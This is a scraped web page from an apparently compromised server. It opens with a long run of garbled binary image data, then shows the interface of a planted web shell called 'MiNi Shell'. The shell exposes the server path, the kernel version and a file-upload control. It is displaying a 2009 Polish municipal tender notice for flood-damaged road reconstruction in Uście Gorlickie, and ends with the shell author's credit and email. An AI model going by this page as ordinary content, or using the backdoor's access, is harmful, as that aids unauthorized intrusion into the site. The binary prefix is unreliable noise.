JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090813/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090813/133631-N-2009.html

<p class="kh_header"><b>Uście Gorlickie: Odbudowa po powodzi dróg gminnych w gminie Uście Gorlickie o łącznej długości 1600m
w tym droga w miejscowości: Hańczowa dł. 250m st. dz. nr 104/4, 101/4, 103/2 w km 0+000 ÷0+250, Hańczowa obok Romana st. dz. nr 221 dł. 700m w km 0+000 ÷ 0+700, Uście Gorlickie Os. Bielańskie st. dz. nr 586/4 na dł. 300m w km 1+100 ÷ 1+400, Skwirtne st. dz. nr 71 dł. 350m w km 0+100 ÷ 0+450</b><br>
<b>Numer ogłoszenia: 133631 - 2009; data zamieszczenia: 13.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy Uście Gorlickie , Uście Gorlickie 80, 38-315 Uście Gorlickie, woj. małopolskie, tel. 018 3516041 w. 55, faks 018 3516042.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.usciegorlickie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbudowa po powodzi dróg gminnych w gminie Uście Gorlickie o łącznej długości 1600m
w tym droga w miejscowości: Hańczowa dł. 250m st. dz. nr 104/4, 101/4, 103/2 w km 0+000 ÷0+250, Hańczowa obok Romana st. dz. nr 221 dł. 700m w km 0+000 ÷ 0+700, Uście Gorlickie Os. Bielańskie st. dz. nr 586/4 na dł. 300m w km 1+100 ÷ 1+400, Skwirtne st. dz. nr 71 dł. 350m w km 0+100 ÷ 0+450.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1) Odbudowa po powodzi drogi w miejscowości Hańczowa dł. 250m st. dz. nr 104/4, 101/4, 103/2 w km 0+000 ÷0+250
Zakres robót obejmuje:
a) Zdjęcie warstwy ziemi urodzajnej gr. 15cm - 500m2
b) Roboty ziemne - odwóz ziemi urodzajnej na odkład do 1km - 75m3
c) Podbudowa dolna z kruszywa naturalnego grubości 20cm (warstwa wzmacniająca) - 850m2
d) Dolna warstwa podbudowy z kruszywa naturalnego gr. 10cm = 850m2
e) Podbudowa górna z tłucznia gr. 8cm - 480m2
f) Nawierzchnia- powierzchniowe utrwalenie trzykrotnym skropieniem emulsją asfaltową i grysami - 480m2
g) Roboty ziemne przy poszerzeniu korpusu drogi i na rowach z transportem na odkład do 1km - 480m3
h) Rury betonowe pod zjazdami wraz ze skosami fi50 10mb
i) Przepusty żelbetowe fi60 12mb
j) Umocnienie dna rowu el. betonowymi grubości 15cm na podsypce piaskowej 30mb

2) Odbudowa po powodzi drogi w miejscowości Hańczowa obok Romana st. dz. nr 221 dł. 700m w km 0+000 ÷ 0+700
Zakres robót obejmuje:
a) Podbudowa dolna z pospółki grubości 20cm - 2450m2
b) Podbudowa górna z tłucznia grubości 10cm - 2100m2
c) Nawierzchnia - powierzchniowe utrwalenie trzykrotne skropienie emulsją i grysami - 2100m2
d) Roboty ziemne na rowach z transportem na odkład do 1km - 525m3

3) Odbudowa po powodzi drogi Uście Gorlickie Os. Bielańskie st. dz. nr 586/4 na dł. 300m w km 1+100 ÷ 1+400
Zakres robót obejmuje:
a) Podbudowa dolna z kruszywa naturalnego gr. 10cm - 1500m2
b) Podbudowa górna z tłucznia grubości 10cm - 900m2
c) Nawierzchnia- powierzchniowe utrwalenie trzykrotnym skropieniem emulsją asfaltową i grysami - 900m2
d) Uzupełnienie poboczy kruszywem - 600m2
e) Uzupełnienie skarp i dna rowu elementami betonowymi z wykonanie studzienki na wypadzie 50mb

4) Odbudowa po powodzi drogi w miejscowości Skwirtne st. dz. nr 71 dł. 350m w km 0+100 ÷ 0+450
Zakres robót obejmuje:
a) Podbudowa dolna z pospółki grubości 20cm - 1190m2
b) Podbudowa górna z tłucznia grubości 8cm - 1050m2
c) Nawierzchnia - powierzchniowe utrwalenie trzykrotne skropienie emulsją i grysami - 1050m2
d) Roboty ziemne na rowach z transportem na odkład do 1km - 350m3.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W przetargu mogą wziąć udział Wykonawcy, którzy:
1 złożą ważną i odpowiednią ofertę oraz:
1.1. posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
1.2. posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
1.3. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
1.4. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 PZP,
a ponadto:
1.5 dysponują osobami zdolnymi do wykonania zamówienia, oraz posiadającymi kwalifikacje niezbędne do wykonania zamówienia tj.:
min. 1 pracownikiem z uprawnieniami do wykonywania samodzielnych funkcji kierownika robót i mogącym wykazać się decyzjami o stwierdzeniu 
przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych
w budownictwie w zakresie robót drogowych. W/w  osoby winny być członkami właściwej Izby Samorządu Zawodowego oraz posiadać stosowne zaświadczenia.
1.6 wykonali w okresie ostatnich 5 lat przed wszczęciem postępowania o udzielenie 
zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,
min. 1 zadanie w zakresie budowy lub przebudowy  lub remontu dróg ( w tym roboty bitumiczne) o wartości min. 150.000,00 zł brutto, z podaniem ich wartości oraz daty i miejsca wykonania wraz z załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie.
1.7 winni dysponować potencjałem technicznym tj. sprzętem niezbędnym do wykonania 	zamówienia.
1.8 są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę minimum wartości składanej oferty brutto.
1.9 oświadczają, że spełniają warunki określone w art. 22 PZP oraz nie podlegają wykluczeniu z postępowania o udzielenie zamówienia zgodnie z art. 24 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych.
1.10	zgodnie z art. 26 ust. 2 załączą dokumenty wymienione w § 1 ust.1 pkt 2,3,4,5 ust. 2 pkt 1, 3,5,6 oraz ust. 3 pkt 2, 3 Rozporządzenia Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 87 z dnia 24 maja 2006 r. poz. 605 z póź. zmianami).</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wypełniony i podpisany formularz oferty (załącznik nr 1).
2. 	Podpisany kosztorys ofertowy opracowany na podstawie przedmiaru robót (załącznik nr 2).
3.	Zgodnie z art. 26 ust. 2 załączą dokumenty wymienione w § 1 ust.1 pkt 2,3,4,5 ust. 2 pkt 1, 3,5,6 oraz ust. 3 pkt 2, 3 Rozporządzenia Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 87 z dnia 24 maja 2006 r. poz. 605 z póź. zmianami).:
a)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie
do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
b)	aktualna informacja z Krajowego Rejestru Karnego  w zakresie określonym w art. 24 ust. 1 pkt 4-8  ustawy , wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
c)	aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 PZP, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
d)	aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków, opłat, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji organu podatkowego - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, 
e) aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji organu podatkowego - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, 
f) wykaz wykonanych robót budowlanych w okresie ostatnich 5 lat, przed dniem wszczęcia postępowania o udzielenie zamówienia a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - wg ZAŁĄCZNIKA NR 4 do SIWZ,
g) dokumenty (referencje lub inny dokument) od poprzednich Zamawiających potwierdzające, że roboty wymienione w załączniku Nr 4 zostały wykonane należycie, 
h) wykaz sprzętu - wg ZAŁĄCZNIKA NR 5 do SIWZ
Do wykazu należy dołączyć pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń,  jeżeli w w/w wykazie Wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował.
i) wykaz osób, które będą uczestniczyć w wykonaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych i doświadczenia wraz z dokumentami stwierdzającymi posiadane uprawnienia, - wg ZAŁĄCZNIKA NR 6 do SIWZ,
Do wykazu należy dołączyć pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w w/w wykazie Wykonawca wskazał osoby, którymi będzie dysponował.
j) polisę lub inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę minimum wartości składanej oferty brutto.
k) Zaświadczenie z banku o dostępie do środków finansowych w wysokości minimum składanej oferty.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.wrotamalopolski.pl/root_BIP/BIP_w Malopolsce/gminy/root_Uscie+Gorlickie/podmiotowe/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Materiały przetargowe (udostępniane bezpłatnie) można również uzyskać w siedzibie Zamawiającego, pokój nr 1 lub za zaliczeniem pocztowym..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.09.2009 godzina 09:30, miejsce: W siedzibie Zamawiającego, pok. Nr 3 (Sekretariat) - parter..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com